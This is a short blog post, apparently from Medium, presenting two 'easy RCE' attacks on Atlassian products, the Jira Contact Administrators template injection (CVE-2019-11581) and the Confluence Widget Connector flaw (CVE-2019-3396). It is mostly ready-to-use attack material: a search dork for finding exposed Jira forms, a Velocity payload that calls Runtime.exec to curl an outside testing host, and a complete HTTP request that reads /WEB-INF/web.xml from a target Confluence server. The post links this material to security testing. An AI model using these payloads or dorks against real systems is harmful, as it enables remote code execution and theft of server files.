Two Easy RCE in Atlassian Products

1. Jira Remote Code Execution in Contact Administrators form (CVE-2019–11581)

inurl:secure/ContactAdministrators!default.jspa
  1. Check from the dashboard page that your Jira instance supports Contact Administrator form.
https://jira.example.com/secure/ContactAdministrators!default.jspa
$i18n.getClass().forName(‘java.lang.Runtime’).getMethod(‘getRuntime’,null).invoke(null,null).exec(‘curl http://your-testing-server.com/rcetest?a=a').waitFor()
  • an SMTP server has been configured in Jira and the Contact Administrators Form is enabled; or
  • an SMTP server has been configured in Jira and an attacker has “JIRA Administrators” access.

2. Confluence Remote Code Execution via Widget Connector macro (CVE-2019–3396)

  1. So first it’s an issue with Widget Connector. Which can lead to RCE on the server. Better to check first is your version still vulnerable due to that issue. If yes. Go next.
POST /rest/tinymce/1/macro/preview HTTP/1.1Referer: https://confluence.yourtarget.com/Content-Type: application/json; charset=utf-8Cookie: BIGipServerrb-p_cp-confluence_https_pool=!BUsntvn1os/4xuQWbHAsuN+1fsz22TIKPNFouw==;JSESSIONID=E3A43CEFE1932634CD80E301057C379DAccept: */*Accept-Encoding: gzip,deflateContent-Length: 173Host: confluence.yourtarget.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36Connection: Keep-alive
{"contentId":"123","macro":{"name":"widget","body":"","params":{"url":"https://www.youtube.com/watch?v=1","width":"200","height":"200","_template":"/WEB-INF/web.xml"}}}

I am a guy passionate about testing and security researching 👨‍💻 → t.me/valyaroller

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

A server-less CI/CD approach for mono-repo micro-frontends

Automate Deployments to Multiple App Engine Environments with Cloud Build and GitHub

Deploying a Static Web Application to Heroku

Install and configure Elasticsearch Curator to delete the old indices.

OpenVidu Teaching: Release v1.0.0

Data transformation using Dataweave

Why You Should Deploy Your Code to Production with Hidora

Technica 2021 Organizer Applications are Open!

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Valeriy Shevchenko

Valeriy Shevchenko

I am a guy passionate about testing and security researching 👨‍💻 → t.me/valyaroller

More from Medium

SSL Pinning in IOS Applications

https://go.fiverr.com/visit/?bta=373808&brand=fiverrcpa

Security in Mobile application part3(Multi-factor Authentication)

Session Fixation

Bypassing domain validation